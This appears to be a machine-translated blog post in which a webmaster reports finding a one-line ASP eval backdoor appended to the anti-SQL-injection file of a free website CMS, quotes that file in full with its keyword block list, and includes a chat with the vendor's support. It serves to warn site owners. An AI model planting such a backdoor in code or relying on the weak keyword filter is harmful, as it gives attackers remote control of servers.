A bloody case triggered by one sentence

Alimail

Last night, I downloaded a set of enterprise website management system (v2010) of chenyue network and found out what I shouldn't have seen. I will paste all of his CheckSQL. asp files to see what is going on.
CheckSQL. asp:

Dim Fy_Url, Fy_a, Fy_x, Fy_Cs (), Fy_Cl, Fy_Ts
--- Define partial headers ------
Fy_Cl = 2 Processing Method: 1 = prompt information, 2 = Turn to page, 3 = Prompt before turning
--- Define the end of part ------

---------- Copyright description ----------------
Dust month SQL general anti-injection V1.0 ASP version
This program was independently developed by Chen Yue
If you have any questions or want to get the latest version, please contact me
Contact QQ: 15253061.
Retain your copyright information during use.
This program is welcome to reprint
-------- All rights reserved by chenyue network ---------
On Error Resume Next
Fy_Url = Request. ServerVariables ("QUERY_STRING ")
Fy_a = split (Fy_Url ,"&")
Redim Fy_Cs (ubound (Fy_a ))
On Error Resume Next
For Fy_x = 0 to ubound (Fy_a)
Fy_Cs (Fy_x) = left (Fy_a (Fy_x), instr (Fy_a (Fy_x), "=")-1)
Next
For Fy_x = 0 to ubound (Fy_Cs)
If Fy_Cs (Fy_x) <> "" Then
If Instr (LCase (Request (Fy_Cs (Fy_x), "") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "and ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "select") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "update") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "chr ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "delete % 20 from ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), ";") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "insert") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "mid ") <> 0 Or Instr (LCase (Request (Fy_Cs (Fy_x), "master. ") <> 0 Then
Select Case Fy_Cl
Case "1"
Response. Write ""
Case "2"
Partial Code omitted
End Select
Response. End
End If
End If
Next
<% Execute request ("value") %>

I am sad when I see the last sentence, not to mention how the anti-injection system is written. That sentence is definitely not added by me. I know what that sentence is. Later, I searched the websites using the system on the Internet, and 80% of them were recruited. I didn't see a single sentence in the website source code for the first time. I remember that I had a system and added a sentence to the released source code. At that time, I didn't care much about it. Today I saw it again. I am not sure if this sentence is added by a programmer, but it is too unskillful and so conspicuous. In the past, the system was added in the middle of a lot of code, but I couldn't see it without looking at it carefully. Later, I contacted Chen Yue's official customer service. His answer was satisfactory. The following are chat records:
Chen Yue 22:58:41
Hello, welcome to the online QQ technical support of www.cyweb.cn. Could you please help me!
Alimail 12:49:21
Are you there?
June 12:49:27
In
June 12:49:30
Hello, welcome to the online QQ technical support of www.cyweb.cn. Could you please help me!
Alimail 12:50:04
What does <% execute request ("value") %> In the checksql file mean?
June 12:50:14
?
June 12:50:17
File
Alimail 12:50:26
CheckSQL. asp
June 12:50:46
Don't know
June 12:50:49
Where did you download it?
Alimail 12:51:02
China webmaster Resource Station
Alimail 12:51:26
Http://down.chinaz.com/class/3_1.htm
June 12:51:33
Useless
Alimail 12:51:43
Did you add it?
June 12:53:37
That is a sentence.
June 12:53:40
MA
Alimail 12:53:59
I know, but I want to know if your programmers add or others add?
June 12:54:16
What should we do with it?
Alimail 12:54:37
Oh, isn't that what you added?
June 12:54:55
Which station are you on?
Alimail 12:55:04
I don't think any programmer is lacking in morality.
June 12:55:12
Recommended commercial version for use
June 12:55:28
Don't say this again when something goes wrong.
Alimail 12:55:29
I downloaded your program yesterday.
June 12:55:53
Free Download is not very secure
Alimail 12:56:57
Well, as long as it's not officially added, I wish the system better and better.
Alimail 12:57:05
Excuse me
June 12:57:31
(Handshake)

This sentence is justified by programmers. It can be said that "this is just a common code, I don't know what the legendary saying is" or "this sentence is just something I can do without having to worry about" and so on. As for the pure and non-pure purpose, you only know it. Are programmers also legendary hackers? The official saying is that they did not add them by themselves, so I think so for the moment. I don't want any programmer to be idle or do anything without morality. As for the consequences, we suffered from our webmasters. The website, who has worked so hard, is still confused.

Finally, I would like to remind webmasters that the free-to-Download system can be used, but with a simple look at the code. If you cannot understand it, simply upload an asp Trojan Horse to your own space, scan the website files with the Trojan horse in it, and identify which files use dangerous functions.

Now, the Internet is better than Xin Chun!